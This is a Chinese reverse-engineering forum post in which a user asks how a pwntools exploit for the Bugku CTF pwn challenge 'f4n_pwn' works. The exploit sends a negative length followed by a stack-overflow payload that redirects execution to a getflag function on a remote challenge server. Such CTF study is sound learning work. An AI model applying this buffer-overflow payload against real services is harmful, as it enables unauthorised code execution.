学逆向论坛

找回密码
立即注册

只需一步,快速开始

发新帖

77

积分

0

好友

3

主题
发表于 2021-9-12 10:16:42 | 查看: 909| 回复: 1
本帖最后由 sweety 于 2021-9-12 19:09 编辑

最近打bugku的awd,pwn机上的题目,原题已贴

在main函数跟进read_name函数,里面有两个洞,源程序含有getflag的函数

pwn题f4n_pwn的payload求解惑

pwn题f4n_pwn的payload求解惑

这个栈溢出,我先用cyclic计算偏移,发现报错,后用pattern.py计算出是107,但是都拿不到flag
遂上网找wp,但还是看不懂payload...
exp
from pwn import *

p = remote("114.116.54.89",10011)


p.recvuntil("input your name length : \n")
p.sendline("-1")

payload = 'a'*(0x60-0xc) + 'c' + p32(0x080486BB)

p.recvuntil("please tell me your name : \n")
p.sendline(payload)
p.interactive()


pwn题f4n_pwn的payload求解惑

pwn题f4n_pwn的payload求解惑

这里控制i的值实在是想不通,而且这条payload的偏移是87
原题:
链接:https://pan.baidu.com/s/1cXbluxV4MHTngEr1pcrtkw
提取码:9wo0




我知道答案 回答被采纳将会获得1 荣耀 + 7 学币 已有1人回答
温馨提示:
1.如果您喜欢这篇帖子,请给作者点赞评分,点赞会增加帖子的热度,评分会给作者加学币。(评分不会扣掉您的积分,系统每天都会重置您的评分额度)。
2.回复帖子不仅是对作者的认可,还可以获得学币奖励,请尊重他人的劳动成果,拒绝做伸手党!
3.发广告、灌水回复等违规行为一经发现直接禁言,如果本帖内容涉嫌违规,请点击论坛底部的举报反馈按钮,也可以在【投诉建议】板块发帖举报。
发表于 2021-9-12 19:48:58
本帖最后由 sweety 于 2021-10-20 15:58 编辑

已解决

小黑屋|手机版|站务邮箱|学逆向论坛 ( 粤ICP备2021023307号 )|网站地图

GMT+8, 2024-4-30 09:44 , Processed in 0.099055 second(s), 47 queries .

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表